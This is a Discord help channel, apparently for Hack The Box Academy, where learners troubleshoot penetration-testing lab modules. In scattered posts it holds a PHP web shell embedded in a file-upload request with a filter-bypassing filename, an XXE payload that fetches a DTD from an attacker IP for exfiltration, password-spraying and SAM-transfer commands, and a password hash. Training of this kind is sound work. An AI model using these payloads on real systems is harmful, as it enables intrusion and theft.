#modules

1 messages · Page 160 of 1

median elbow
#

tried adding to original line, so i put sudo apt install freerdp2-x11 --fix-broken if thats what u meant, but did not work

#

Reading package lists... Done
Building dependency tree... Done
Reading state information... Done
0 upgraded, 0 newly installed, 0 to remove and 194 not upgraded.

tried rerunning after, still no :(

next bronze
#

try sudo apt install libfreerdp-client2-2

lusty thicket
next bronze
#

just because it works doesn't mean you should use it kek

median elbow
lusty thicket
fathom pendant
# lusty thicket

It still works, yes, but it's a deprecated command, apt does the same thing

lusty thicket
#

try

next bronze
#

oh yea probably upgrading is a good idea

#

make sure to take a snapshot before

median elbow
median elbow
median elbow
#

then this

`Package freerdp2-x11 is not available, but is referred to by another package.
This may mean that the package is missing, has been obsoleted, or
is only available from another source

E: Package 'freerdp2-x11' has no installation candidate`

next bronze
#

reboot try again

median elbow
#

same response

elfin condor
rustic sage
#

Hello! Could someone please help me out? (dm if comfortable)

misty current
rustic sage
#

Do you know anyone experienced in that field?

median elbow
# median elbow same response

fixed, went back to old snapshot, did these commands in this order

sudo apt-get install aptitude
sudo aptitude install freerdp2-x11

said no to first prompt - "Keep the following packages at their current version: 1) freerdp2-x11 [Not Installed]"

said yes to the second prompt - "The following packages will be DOWNGRADED:
libfreerdp-client2-2 libfreerdp2-2 libwinpr2-2
The following NEW packages will be installed:
freerdp2-x11"

thanks to year old reddit thread :) and also u guys for helping

slender shoal
rustic sage
#

Ohh okay thank you!

elfin condor
#

@misty currentcan i dm u for Documentation & Reporting Practice Lab first qst ?

next bronze
next bronze
cerulean charm
#

hello guys, I'm stuck in Attacking Common Services - Easy, I've got the account and password, and uploaded shell.php in ftp, but trying to execute curl in kali to get the command execution doesn't work, please give me some advices

lusty thicket
cerulean charm
lusty thicket
#

<@&861185840277487616>

ornate trellis
#

Hi guys, I am doing crackmapexec skill assessment question 1 and did not get the password anywhere. I have tested common creds, user as pass that I found by rid bruteforce, pass spray against local and domain. So far no success, can anyone help me to addrress what I am missing here. NOTE: I have checked the hint and followed all tought on the module and also tested guest account.

eternal bison
#

Is lab exercise guidance only for silver annual subscribers or does it apply to silver monthly too?

#

spam

acoustic owl
heavy mango
#

is there a more straight-forward of saving a module to my to do list than browsing all modules and then looking for the specific module?

#

I can't find any "save to my to do list" button when browsing a module, or am I blind?

velvet pasture
#

Can anyone tell me how to connect to the docker host of the PWN Challanges

median gale
#

Identify the following hash: $S$D34783772bRXEx1aCsvY.bqgaaSu75XmVlKrW9Du8IQlvxHlmzLc

#

Using hashid you get Drupal7

#

What kind of format does the answer need to be ?

#

Tried Drupal Drupal7 Drupal v7.x

acoustic owl
#

Enter exactly what hashid gives you as the answer

median gale
#

Drupal > v7.x

#

Still doesnt work

velvet pasture
#

How to connect to the Docker Host for PWN Challenges ??

acoustic owl
#

If you have no access, read and follow #welcome

velvet pasture
#

ok thanks

acoustic owl
median gale
#

Refreshed the page and worked, anyway thank you

flint laurel
#

can anyone help give me a nudge with the skills assessment in using crackmapexec 3rd question

civic zenith
#

When I do: sudo smbserver.py -smb2support share1 /home/legomyegp/CPTS/ and I try to connect to the share I get this:

#

This is from "LLMNR/NBT-NS Poisoning - from Windows" on the Active Directory Enum. and Attacks module

#

I've solved it before, I'm just trying to get the smb share working so I can copy the tools over for the exam.

misty current
#

You can just attach a drive using /drive in the xfreerdp to download the tools over to your machine.

flint laurel
misty current
# civic zenith

Also, you can't get the file transfer using SMB shares because there are security policies which blocks unauthenticated guest access (no username password).
You can either modify the registry key or set credentialed access to your SMB server to overcome this.

civic zenith
#

@misty current wow thx for your help

tepid pagoda
#

Hello, I apologize in advance for not posting this question in the relevant channel (I don't know which one is it). In module Linux Privilege Escalation the button Mark Complete & Next doesn't appear to work. Sometimes I get an error, sometimes I get moved to the next section. When going back to the previous section, I still see the button (which means the section is not completed, so the button does not work).I've tried both Chrome and Firefox.

misty current
tepid pagoda
thin roost
#

when i'm using out of band ssrf my netcat session doesn't respond to the request i'm sending. Could this be an error in the encoded payload? The website i'm posting a html file on is timing out. Not sure what i'm doing wrong. Anyone able to assist?

median gale
#

Been trying to find zip2john for an ex in Hashcat

#

All i end finding is zip2john.c

#

Anyone now where i can find the python version ?

#

Or how to use the c version ?

#

...of course i configured it and used make

thin roost
#

do: whereis zip2john on console

median gale
#

returns zipjohn:

#

I guess that is nothing

thin roost
#

hmm it shoud comes with john, so sudo apt update; sudo apt install john

median gale
#

deleted the folder and installed jumbo version i can a symlink i guess zip2john -> john in the /run folder i guess this is it now

#

./zip2john ../../hashcat.7z
Did not find End Of Central Directory.

#

I guess it is working, got myself a new error haha

thin roost
#

errors are good

median gale
#

For christ shake anyone knows what this is ? It says file is corrupt but can't be

wanton jasper
#

Question about using metasploit to brute smb. I have this output but there is no way all of those are correct. Why does it do this and is it an indication of something I have done wrong?

#

Password Attacks Lab - Medium

#

auxiliary/scanner/smb/smb_login and using the provided uernames and password lists

fathom pendant
#

this one was an interesting one tbh

#

iirc you had to add a flag to the cme command

wanton jasper
#

ok ty, will look there

dreamy solar
#

Hello, I have a problem with exercice, I export my TGT but it is not visible and that doesn't work

median gale
#

/opt/7z2john/7z2john.py hashcat.7z /opt/useful/SecLists/Passwords/Leaked-Databases/rockyou.txt
File "/opt/7z2john/7z2john.py", line 786
print "%s:$7z$0$%s$%s$%s$%s$%s$%s$%s$%s$%s" % (fname,
^

#

What can i possibly do here ?

misty current
wanton jasper
#

found the issue.... I should know better lol. SHould have tried that first

misty current
median gale
#

I get the same error

#

@misty current

misty current
#

python is not the same as python2, your global python environment might be set to python3 when you execute just python.

#

You should have python2 or python2.7

#

You can try that.

median gale
#

the rockyou txt is the mistake

#

I am trying to export the hash not crack it

#

thnak you thaugh

keen stratus
#

thx

misty current
median gale
fathom pendant
median gale
#

Because my brain shortcircuited for a moment

#

Trying to crack a .hccapx file keep getting these any ideas ?

#

The file was create using hashcat utils ./cap2hccapx.bin ../../corp_question1-01.cap ../../to_crack.hccapx

#

Tried both modes 22000 and 22001 cant se other modes used for hccapx files in the hascat wiki

dreamy solar
tardy laurel
#

hey if anyone’s free could i get some help on the “Threat Hunting & Hunting with Elastic”

#

i’m just having some issues with the KQL command on the skills assessment and finding the popular hacking tool on the “Hunting for Stuxbot” minimodule

misty current
pallid sedge
#

Hi. Started my Academy journey very recently. Need some clarification regarding the difference between Rules of Engagement Document and the Contract (Scope of Work). They almost feel like the same thing. Hoped that someone with real life experience might help. Any Thoughts?

west spindle
#

Hey, I am stuck on the question in the Abusing HTTP Misconfiguration Password Reset Poisoning https://academy.hackthebox.com/module/189/section/2014
I can already see the RenderableItem like: RenderableItem=%2Fshow%2F11%2Ftbknixctmh7pzhxj1kgfuw15rtbc2znm
However, I can't browse the it using:

http://IP:PORT/show/11/tbknixctmh7pzhxj1kgfuw15rtbc2znm

Any hint would really appreciate

dreamy solar
misty current
# dreamy solar

Remember you're looking for a machine ticket, not a user ticket. It's represented as a keytab file. The location you need to get it is not in /tmp.

sly dome
#

i dont get the point of 'Thick Client Applications'

#

randomly it starts using x64dbg

#

without prior introduction

dreamy solar
fathom pendant
misty current
#

Revise about the keytab section again.

dreamy solar
#

oh yes I see now , indeed

#

thanks you

wanton jasper
#

had to look at some hints for Password Attacks Lab - Medium, how was I supposed to know to use that one users key to then use it on the final user? I hope am not to vague but I am trying to avoid spoilers

#

I would have never thought to try to ssh with that final user

fathom pendant
pallid sedge
wanton jasper
#

just gonna have to change the way my brain thinks about things

fathom pendant
obtuse verge
#

hey guys
on "AD Skills Assessment - Part I"

I got problem with the upload function in Antak (want to put do tunneling with ligolo but for some reason it does not allow to upload the exe) (trying to pivot to MS01)
can someone please help?

steel dawn
#

DOCUMENTATION & REPORTING - Notetaking & Organization
(TMUX)
Steve is learning about the tool that can make logging a session easier. He messages you for help mentioning that he would like to try to split the panes vertically. What do you tell him?
(Answer format: [key] + [key] + [key], i.e., fill in the values for "key" and leave the brackets and + signs.)

The answer would be
ctrl + b + %

but following the format it would be
[Ctrl] + [b] + [%]

Both answers are wrong -_- what is the correct format? xD

proud tusk
#

the way you write it is if you have to press the 3 keys together

#

@steel dawn its CTRL + B and after release those and press %

misty current
wanton jasper
#

can I dm someone for sanity check on intital foothold on Password Attacks Lab - Hard? Im pretty sure im dong the right thing but its taking so long

steel dawn
misty current
#

Make sure you're not leaving any whitespaces at the beginning or the end.

#

Also, wrap up your text with spoilers tags.

steel dawn
wanton jasper
# lusty thicket where are you stuck?

Waiting on ||crackmapexec smb <IP> -u johanna -p mut_password.list --shares|| to find a pw, just want to be sure I am doing the correct thing for inital creds because it has been going for a long time

lusty thicket
misty current
#

@steel dawn You got the answer, prolly some silly character messing with you.

lusty thicket
wanton jasper
hallow kiln
lusty thicket
hallow kiln
#

you don't need another protocol either

lusty thicket
hallow kiln
#

sure, but that's not the issue here

wanton jasper
#

I think its just a time thing

#

have to wait longer

hallow kiln
#

rdp will be slower, yes

unreal granite
wanton jasper
unreal granite
#

Oh sry thought you was attacking rdp

next bronze
#

hydra supports rdp now anyways

wanton jasper
#

guess I should stop sitting here and watching it lol. Maybe see what outdoors looks like.

latent glen
#

Good evening guys, I have a tiny question. Ive got user on this box on the metasploit module. Now I have to use priv esc on the box and I know which exploit I have to use but I just cannot geet a session to pop.. Could anyone tell me what Im missing here?

rustic sage
#

Module: File Upload Attacks
Whitelist filters

I've tried both methods and neither of them is working. One of them (Double Extension OR Reverse Double Extension) uploads my script but then the script itself is not accessible, and the second method (Character Injection) is just not working at all. I've done File Upload Attacks in the wild and this is really odd. Help?

#

Update: Got the shell to upload but it's not printing the results of my query. Any help is greatly appreciated

slender shoal
rustic sage
slender shoal
#

yup

rustic sage
#

Content-Disposition: form-data; name="uploadFile"; filename="shell.phps.\.jpg"
Content-Type: image/jpeg

<html>
<body>
<form method="GET" name="<?php echo basename($_SERVER['PHP_SELF']); ?>">
<input type="TEXT" name="cmd" autofocus id="cmd" size="80">
<input type="SUBMIT" value="Execute">
</form>
<pre>
<?php
if(isset($_GET['cmd']))
{
system($_GET['cmd']);
}
?>
</pre>
</body>
</html>

#

I've also tried the same with the simplest shell I could do, same thing - it gets uploaded correctly, is visibly there but doesn't return anything.

slender shoal
#

One second. Testing something.

rustic sage
#

For sure, appreciated.

#

Also I don't think you were mod last time I saw you, congrats!

latent glen
#

could anyone help with the privesc in the Metasploit Framework module, sessions & jobs

slender shoal
main halo
#

Is this a ok place to ask general questions.

I'm wondering does htb give certs.
Are they worth anything for job.

As I have skills but 0 currently active cert.

And ether where I worked is gone cuz covid shut down or nda so my resume sparce

slender shoal
rustic sage
latent glen
latent glen
#

okay

fathom pendant
#

Are you sure all parameters are correct, if you're on jump host (an box in the middle) are you using the right LHOST

cedar void
#

"Using the concepts taught in this section, connect to the web server on the internal network. Submit the flag presented on the home page as the answer. "

I am not sure how to get to the home page. I tried using the gobuster tool to find out the directories for the home page but that didn't help.

https://academy.hackthebox.com/module/158/section/1434

gray merlin
gray merlin
#

Look at the top of that page.

cedar void
gray merlin
halcyon spire
#

how do you locate the Build number of target windows

gray merlin
high hearth
#

Is there a way to get this popup back after closing it?

languid fjord
#

if you click on the machine, and scroll down, it should have a "share results"

high hearth
#

This is the bottom of the machine, it doesnt show the share button there. @languid fjord

languid fjord
#

interesting, Dancing is starting point, correct?

#

Might be different on starting point - let me look into it

high hearth
#

Yes. That’s in starting point.

#

It’s ok if you cant find it. I was able to save the link I had copied. ☺️

next bronze
#

oh wait you've got the link copied already kek

high hearth
umbral wasp
#

I am unable to exploit done every thing

fathom pendant
vast geyser
#

Does anyone know why can't rdp the lab in ACTIVE DIRECTORY ENUMERATION & ATTACKS module?

fathom pendant
#

does the section say to rdp

vast geyser
#

yes
Otherwise like this:

fathom pendant
#

press enter

vast geyser
#

!

#

oh

fathom pendant
#

believe it or not you're not the first person to be caught by that

vast geyser
#

Thank you. I think it broken

fathom pendant
#

you're not the only one that's thought that

fathom pendant
#

you can probably use discord search feature to look for the issue

kind fern
#

Hi, sorry if I have a question about HTB Machines where should I ask?

fathom pendant
brave forge
#

Hello! I'm a beginner and confused about what module I should learn after the "Intro To Academy". Is there any guideline on what I should take after that? Thank you!

fathom pendant
brave forge
fathom pendant
#

It's pretty good for beginners as it explains a lot of the stuff

#

some of it requires some external research

#

but for the most part the theory is well explained

#

if you want an extremely hand holding experience THM is better for that

#

but you're not going to run into too many situations where the way to achieve the answer isn't in the module itself

brave forge
fathom pendant
#

THM is TryHackMe it's a different site

#

in case you werern't aware

honest egret
#

can you tell me what is unique path? is it the urls in the source code?
how to I fetch it. With regular expressions?

rustic sage
#

Hello everyone im in assembly language module skills assesment part 2, im trying to get the flag for 4 days but im stuck and i dont know how to do it, could somebody help me?

fathom pendant
honest egret
#

I am on this for maybe 1 hour. Cant find the solution

fathom pendant
#

1 the answer is gonna be a big number (less than 100) and 2 the section is about filtering

#

so you'll probably need to filter via regex stuff

honest egret
#

shows 0

#

My logic was to filter grep and add everything until a space is encountered

rustic sage
#

hello could somebody help me with assembly module skills assement, please?

fathom pendant
#

you also don't need to double up the / and just grep for inlanefreight.com

#

if you're curious about why a result is x, always step back your answer

#

and see why you're only getting x result

honest egret
fathom pendant
#

you really don't need to regex it; you can just look for instances of inlanefreight.com

#

as they'll often be followed by the path; then you sort unique; then wc

honest egret
#

is the answer 33?

#

it shows incorrect

fathom pendant
#

close

hot saffron
#

The sql injection isn’t clicking for me. Is there any indication my injection is doing anything besides the final login

honest egret
#

@fathom pendant can I inbox you?

fathom pendant
#

no

rustic sage
#

hey could somebody help me with assembly language module? im stack in the last question for 4 days

rancid bison
#

Hi there !
Could I request the help of someone ?
ZAP HUD doesn't work on my instance. I can't launch any scan from there.
Does someone know how I can fix this ?
I already updated Zaproxy but it didn't change anything.

lusty thicket
thin roost
#

spend 2 days on Blind SSRF Exploitation Example module trying to get stuff to work with my own kali install, turns out if i use pwnbox it just works, while my own machine times out trying to communicate with servers

#

oh well it was good practice lol

marsh echo
#

hello for windows module i find the version but my anwser don't match

misty current
marsh echo
#

i find thx

wanton jasper
#

I have not done this module but did you scan UDP as well?

steady dust
#

Hello, do you have any idea why in the module AD / Internal Password Spraying - from Linux, none of the commands are working? I validated manually with rpcclient the user, but even the bash command is not working.

cedar void
acoustic owl
cedar void
acoustic owl
olive fiber
steady dust
olive fiber
#

great

fathom pendant
#

wdym can't use LS/DIR all you're showing btw is using crackmap; also you're spoiling the password and user

earnest zenith
#

keschler@Anonymous:~/Downloads$ smbclient -U john \\10.129.127.46\CASSIE
Password for [WORKGROUP\john]:
Try "help" to get a list of possible commands.
smb: > ks
ks: command not found
smb: > ls
NT_STATUS_ACCESS_DENIED listing *
smb: >

fathom pendant
#

you can redact with -user -pass

#

also wrap your command stuff in triple backticks

earnest zenith
fathom pendant
#

that way if something like character escaping happens (\ escapes characters) then it shows up properly

#

replace the USERNAME and PASSWORD that you're showing with just the words user pass

#

also I don't recall if that password is that plaintext

#

i thought it was more involved but i could be wrong

#

been a minute

earnest zenith
fathom pendant
#

I meant when you're sharing what you've tried

earnest zenith
#

ok 😅 xD

fathom pendant
#

the alternative is using first initial and * (I.e. j*)

earnest zenith
#

So how do I find it out?

fathom pendant
#

idk you should be able to use dir on it

#

¯_(ツ)_/¯

paper crag
#

Module: Using CrackMapExec
Section: Mapping and Enumeration with SMB
Question: Enumerate all computers and identify the one missing in the section example. Submit the computer name as the answer (include the symbol $).

This doesn't appear to work the way it's shown in the example. Running this in the lab comes back blank. Any suggestions?

fathom pendant
#

but idk if your password is actually correct

earnest zenith
fathom pendant
#

don't have my notes on me to verify the correct password

#

still spoiling the answer

earnest zenith
#

? It is not the answer

fathom pendant
#

i forget if it's -windows-auth or -local-auth for cme

rare swan
#

how can i uplaod screenshots

fathom pendant
#

but use that to verify

earnest zenith
#

I don't understand

fathom pendant
oblique spoke
#

Hello! i got stuck with this one question in Active Directory Enumeration & Attacks ACL enumeration

#

"What is the ObjectAceType of the first right that the forend user has over the GPO Management group? (two words in the format Word-Word) "

fathom pendant
oblique spoke
fathom pendant
earnest zenith
fathom pendant
#

SMB Sip

#

it's generally windows

earnest zenith
fathom pendant
#

yes

#

SMB is generally on a Windows host

#

you can connect with a Linux client

earnest zenith
#

Ok, and when I connect to it via smbclient how can I find the flag?

fathom pendant
#

should be able to find it using dir

#

like i said if you do the password attack with (I think) --windows-auth

earnest zenith
#

But as I said dir is not possible

fathom pendant
#

it should eliminate false positives

earnest zenith
#

where would I need to specify --windows-auth

fathom pendant
#

with CME

gray merlin
#

--local-auth.

fathom pendant
#

thanks I get it mixed up with a few other commands

earnest zenith
#

But that gives the same result

#

So I dont see the diffrence

fathom pendant
#

¯_(ツ)_/¯

#

what module and section is this?

earnest zenith
#

Password Attack and Network Services

fathom pendant
# oblique spoke so what is?
oblique spoke
#

thank you

fathom pendant
earnest zenith
paper crag
rare swan
fathom pendant
#

btw @earnest zenith if you want a smaller list, on the previous ones you can create a shorter username list by checking the C:\users\ directory

rare swan
#

Module: Web Attacks Section: Blind Data Exfiltration -- <!DOCTYPE email [ <!ENTITY % remote SYSTEM "http://10.10.16.30:8000/xxe.dtd"> %remote; %oob; ]> Doesnt hit my php server on port 8000 -- why? any suggestions

#

php -S 0.0.0.0:8000

#

Got it -- had a typo

uneven shard
#

Hi there - have been bashing my head against this module / question all day: Broken Authentication - Brute Forcing Usernames - Question 2

I've used Burp Suite and **wfuff **trying to figure this out. The username answer to the first question appears in multiple wordlists, the top-usernames-shortlist.txt and xato-net-10-million-usernames.txt

I'm aware that the hidden inputs in the form are populated on response and have tried various strings to check, among other things, teh values of those fields, the use of Remember me and who knows what else at this point. Any guidance or hints would be very welcome because running through another hour each time to try something new isn't conducive to progress.

paper crag
flint laurel
#

Hi guys,

I am doing the module using crackmapexec skills assessment.

And I am stuck on the 3rd question. I have got 5 credentials J******, A***, S*****, A*************, SQ*****

I need to get on the DEV01 device but no route.

I am getting an error when I try to take screenshots of the users screen.

bleak totem
#

Hello, I have a problem on module Shell & Payloads on section Laudanum, One Webshell to Rule Them All.
I have my webshell, but when I write the path where I am, but nothing is good.
Can someone help me about answer ?

fathom pendant
#

Iirc it includes the webshell name

deep shore
#

Hey all! I'm wondering if I've got an issue with RDP on the Pass the Ticket from Windows section of Password Attacks. I'm trrying to authenticate with the provided credentials in the initial positioning portion of the lab, and I'm getting an NTSTATUS_LOGON_FAILURE. Has this happened to anyone before who can shed some light on a solution? I'm glad to try bruting again... 👀

#

Hey! Just in case people wonder in the future, I had not escaped some chars in the password and bash interpreted them before the RDP program did. Escaped with backslashes and works fine. Thanks anyways!

bleak totem
fathom pendant
vague nymph
#

Hi all, I have questions about Linux Container(learned from LXD in module : Linux Escalation)
Q1:
For example, I wrote my current shell process id to the file /sys/fs/cgroup/pids/test/tasks
then the output of the command
$(cat /sys/fs/cgroup/pids/test/tasks 1>&2 )
showed three process id. Why?

Q2:
then I set the pids.max file to 2
why when I typed again
$(cat /sys/fs/cgroup/pids/test/tasks 1>&2 )
the output was
-bash: fork: retry: No child processes

(note for Q 1:
I have done some searches and the found the answer is subshell, cat's process id, and the one that i wrote into the file. But still, I don't really get it what do subshell mean in this command)
(note for Q 2:
the pids.max file controls the number of process that can run. Is this correct?)

wraith spoke
#

module: file upload attacks, whitelistfilters. question: I managed to upload a few shells with difficult chars in them. how can I open these shells from a webbrowser or should i use curl? ||shell.phtml/.jpg||

nova snow
#

Hello everyone. I'm stuck in the last 2 questions of AD Skill_2: Submit the contents of the flag.txt file on the Administrator desktop on the DC01 host.

I have the credentials of the user with GenericAll user and I try to ACL abuse

Can anyone to help me?

wraith spoke
bright quiver
#

Can anyone give me a hand wioth attacking lsass - file transferring? I was trying this here : sudo python3 /usr/share/doc/python3-impacket/examples/smbserver.py -smb2support CompData /home/ltnbob/Documents/

C:> move sam.save \10.10.15.16\CompData

but i get the exception / denied error and it seems like the drive won't mount/create either

#

anyone!

acoustic owl
bright quiver
#

@acoustic owl i changed it, but it isn't working lol..it keeps running in terminal and never created the share on attacker machine

#

this is what i am running to try and create the share:|| python3 /usr/share/doc/python3-impacket/examples/smbserver.py -smb2support Lsass /home/htb-ac-814020/lsass1||..it never creates it...then for some reason when using net use \IP\Lsass it completes fin...just odd but I cannot get to it and nothing exists on my end as the attacker because it never gets created...i just get this

dull thistle
#

Hi I'm kind of failing on "Find and submit the contents of the TXT record as the answer." from "Active Subdomain Enumeration"
I've been going through some discord history + I'm a DNS noobie so I'm stuck but trying to learn a bit more 😛
I found the subdomains and I've used || dig txt internal.inlanefreight.htb @rustic sage || but nothing shows up (saw that I needed to try out || internal || as a hint in here. But still comes up blank. I could use a hint, what am I doing wrong? 😄

lusty thicket
#

why 127.0.0.1 ?

bright quiver
#

NVM - figured it out

dull thistle
lusty thicket
dull thistle
dull thistle
unkempt token
lusty thicket
high hearth
#

Is there any system outtages? My openvpn connection to Starting Point keeps getting dropped.

#

Im going to try and restart and see if that works

unkempt token
#

i dont think so

#

Let me check kali

high hearth
#

Trying that now. Thanks

unkempt token
#

working for me

thorn urchin
#

mult openvpn sessions even sabotaged me on oscp lol

high hearth
#

No pwnbox. It connected again. Let me see if it lets me ping this machine.

#

No replies. It keeps getting stuck there.

thorn urchin
high hearth
#

This is what it says. This time Im connected to the openvpn.

fast silo
#

Hello there, does anyone have any ideas on how to exploit Samba SMB 3.0.14a specifically? I am struggling with it and I would like to bounce back some ideas to see where I am lacking knowledge. Thanks! 😄

unkempt token
#

try to do sudo nmap -sS <address>

fast silo
# thorn urchin which module are you doing?

It's a bit weird on my case, it's from my university's course... my teacher mixed up a few HTB machine vulnerabilities and they need solving (don't really know which ones specifically for obvious reasons.. 😅 ) I'd understand if y'all can't help if it isn't a specific HTB module......

thorn urchin
fast silo
#

I assume my question would go to offtopic ... ?

unique palm
#

Did anyone acutally managed to solve the "password attacks" in 8 hours? 8 Hours seems like a big stretch for me 😄

#

oh god.. im at PTT Linux and i am in for a week already on the password attacks module fingerguns

wraith spoke
#

module: file upload attacks, whitelistfilters. question: I managed to finaly get the solution, use burp instead of zap. now the question is, what is the difference between burp and zap that I managed to get a result with intruder using the same wordlist as in zap. setting used in burp was switch off url encode, but i did not encode in zap. I hope some can explain me 😄

bright quiver
#

Can someone assist with why Lazagne is auto closing after running it for the credential hunting in windows section?

acoustic owl
bright quiver
#

@acoustic owl i copied from my host to windows with copy/paste for xfreerdp, then i go into PS which i run as admin and then do start lazagne.exe all

#

and it runs, but then closes right after

thorn urchin
#

show your term output

acoustic owl
bright quiver
#

@acoustic owl ok let me try that

thorn urchin
#

lazagne runs in both

#

doesnt matter which

bright quiver
#

@acoustic owl same thing happens

thorn urchin
#

share your terminal output

bright quiver
#

so i ran the troubleshooter and it seems to have fixed it - may be some compatibility issues

thorn urchin
#

¯_(ツ)_/¯

#

You wont share your terminal output so who knows

acoustic owl
#

If you open a console and enter ./lazagne.exe all, the console will not close, right?

But if you enter start lazagne.exe all, PS opens another cmd console, runs lazagne and closes the window again.
I thought this doesn't happen under cmd, but apparently it also happens under cmd.exe

thorn urchin
#

I dont think Ive ever ran a tool inside PS by prefixing with start

#

We can speculate what could be happening all day but if they wont share what theyre actually doing its pointless

unique palm
#

im on the password attack module in the proteceted file section anybody knows the password to kira?

Use the cracked password of the user Kira and log in to the host and crack the "id_rsa" SSH key. Then, submit the password for the SSH key as the answer.

acoustic owl
wicked mountain
#

RDP instance keeps dropping from within the pwnbox instance? connection timing out on the RDP client, per the error log

#

for clarity, the RDP instance was freshly spawned with over 60 minutes remaining. Also after 10 minutes I am able to reconnect to the RDP instance with persistent state - so the VM instance isn't dying, but the tunnel...

thorn urchin
#

Attacking Common Applications

cedar void
#

I don't know why everytime I run this proxychain command , it shows the rdp port as closed ...but In the module example, the rdp port is open.
https://academy.hackthebox.com/module/158/section/1438

"Using the concepts taught thus far, connect to the target and establish an ICMP tunnel. Pivot to the DC (172.16.5.19, victor:pass@123) and submit the contents of C:\Users\victor\Downloads\flag.txt as the answer. "

I attempted this module multiple times

thorn urchin
#

its showing closed for timing out, you sure your tunnel is working

stone ether
#

Login form attacks
I’m having a bit of trouble , anyone know why it says that the rockyou.txt file is not found but when I use locate it find it -thanks in advance

next bronze
stone ether
misty current
stone ether
misty current
#

iirc, the second path from the locate output might be the valid one.

stone ether
#

Guess not lol

misty current
#

PwnBox should have one tho. Refresh the locatedb and try to locate it again pika_sip

high hearth
stone ether
#

wasnt able to finish tonight will try again tomorrow its late for me goodnight

misty current
uneven shard
rustic sage
#

Hello everyone i need help with assembly language module can someone help me please?

cedar void
uneven shard
cedar void
fading olive
#

hello everyone, I am on the LIVE ENGAGEMENT part from the module Shells & Payloads and am currently doing the first machine host-1. I was able to connect to the attack box, I saw the cred-access.txt file, I was able to open the tomcat webserver on a browser and connect, and I am able to upload .war files on it, to deploy them and see them being live on the /manager directory.
I tried two things to gain a shell:

  • craft the payload java/jsp_shell_reverse_tcp with msfvenom
  • have metasploit do everything using the payload java/meterpreter/reverse_tcp

both of those approaches are described in this website that I found: https://vk9-sec.com/apache-tomcat-manager-war-reverse-shell/
I do pay attention to use the ip of the attack box and to use the correct ports.
My problem is that for metasploit I get this error:
[-] Exploit aborted due to failure: unknown: Failed to execute the payload
And when I try without metasploit, I run "nc -lvnp 243" deploy the payload on the website and click on it but I never get anything on cli, even after the page has fully loaded.

I would appreciate any help !

fresh compass
lusty thicket
fading olive
next bronze
#

use regex match, you selected literal string

lusty thicket
#

yes 👍

dreamy solar
#

nothing changes ^^""

next bronze
#

that's because you typed the regex pattern wrong

lusty thicket
#

^User-Agent*$

#

try

next bronze
#

there's a period in the regex pattern

#

cmon guys, it's not hard to read and copy from the example...

analog dock
#

@next bronze there’s no period in this regen pattern 🤔

next bronze
#

I meant in the correct pattern

#

here

dreamy solar
#

the pattern is good

#

In Regex

#

but no change situation

lusty thicket
dreamy solar
#

yes now it is okay thanks

next bronze
smoky vortex
#

Hi, I'm doing "Firewall and IDS/IPS Evasion - Medium Lab". nmap reports some info as DNS server version, which isn't accepted as the response. Am I correct, that I should find numeric version of the DNS server?

lusty thicket
smoky vortex
lusty thicket
smoky vortex
undone cypress
#

Hi, you managed to figure out the reason for this error, I have the same thing.
Although I copy the certificate key one by one.

sacred orchid
#

can someone give me a tip for the Automated Scanners flag from the File Inclusion module

With a standard ffuf scan i was able to discover that the parameter ?view can be used
ffuf -w /opt/useful/SecLists/Discovery/Web-Content/burp-parameter-names.txt:FUZZ -u 'http://94.237.48.48:58377?FUZZ=value' -fs 2287 | grep -v 2309

Followed by finding matching exploits with
ffuf -w /opt/useful/SecLists/Fuzzing/LFI/LFI-Jhaddix.txt:FUZZ -u 'http://94.237.48.48:58377/index.php?view=FUZZ' -fs 2287 | grep -v 515

But now I can't seen to figure out how to read the flag at /flag.txt
Log Poisoning is not posilbe I can't find any access or error logs
File upload is not possible because there is no option to upload
PHP Wrappers I can't seem to find the configuration file to check if any filters are enabled

Help would be appreciated

misty current
atomic prism
#

Hello, is there a hacker here?

slender shoal
dreamy solar
#

Again, I know that stupid questions can be annoying but I'm just looking for additional information on the modules and obviously this is the channel for it. I tested with Zap but the regex option cannot be activated, what should I do to access it?

lusty thicket
#

try

dreamy solar
#

....

#

If I ask the question it’s because it’s not working

unique palm
acoustic owl
undone cypress
steady dust
#

Is it normal for Get-DomainObjectACL from Powerview to take a lot of time to execute? I started 15 min ago and it's still running. And it's not blocked...

#

They warn you that in the lab environment it might take 1-2 minutes to run and maybe even more in a real large environment.

sacred orchid
fallow depot
#

Hey guys, i got this: Target: Target is spawning...
And it doesnt spawn 😮 It keeps loading and loading but nothing happens

#

Error: something went wrong. Thats what i get

unique cape
#

can someone help me with the medium footprinting lab?

hexed tinsel
#

hi guys, i m stuck in the last question "Pass the Ticket (PtT) from Linux" "Use the LINUX01$ Kerberos ticket to read the flag found in \DC01\linux01". i run linikatz, find the /etc/krb5.keytab file, that i use to extract hashes : python3 /opt/keytabextract.py /etc/krb5.keytab.
however, i cant crack the ntlm hashes, then i guess i m not using the right file. i looked a an htb forum and it says that we have to find a kt.file. but it doesn't work, ./home/carlos@inlanefreight.htb/.scripts/svc_workstations._all.kt
./home/carlos@inlanefreight.htb/.scripts/svc_workstations.kt, thanks a lot

wraith spoke
#

Skills Assessment - File Upload Attacks: question pls give me nudge...

lusty thicket
lusty thicket
wraith spoke
shut ivy
#

can anyone help me with the hashcat modules?

lusty thicket
#

resource=upload

#

try

unique cape
lusty thicket
#

with the sa creds you found

fathom pendant
lusty thicket
fathom pendant
#

while that is true: it's still an assummption

lusty thicket
wraith spoke
lusty thicket
unique cape
fathom pendant
hazy grotto
#

Hey @fathom pendant may i PM you?

fathom pendant
gray chasm
#

Does anyone know where this comes from? ---> Which employee is suspected of performing potentially malicious actions in the real environment?, module ------> INTRO TO NETWORK TRAFFIC ANALYSIS

#

section---> Packet Inception, Dissecting Network Traffic With Wireshark

lusty thicket
bright quiver
#

Can someone give a nudge on where to go from here: right now i am doing the credential hunting in linux looking for will PW...I have kira rsa passphrase, i have her PW...i downloaded the two .bak files but they don't show anything in them...any other hints on where to look/what to run? I tried downloading lazagne, but it doesn't seem to be working. I get a no module error and i cannot run the exe...any assistance would be great - feel free to DM if need be

bright quiver
#

password attacks/credential hunting in linux...

minor cave
#

is anyone else having issues RDPing into the "LLMNR/NBT-NS Poisoning - from Windows" box for the Active Directory Enumeration & Attacks module? I seem to be able to RDP into all other windows machines in the other modules, however it appears as though this specific machine just hangs on a black screen when connected

bright quiver
#

@fathom pendant let me try that

minor cave
#

Still testing other machines and it appears to work fine, its just the one box

fathom pendant
#

also you won't be able to run the exe on the target

#

as it's a linux system

bright quiver
#

@fathom pendant - understood...trying the firefox portion of the section now

slender shoal
minor cave
fathom pendant
#

it claims another victim

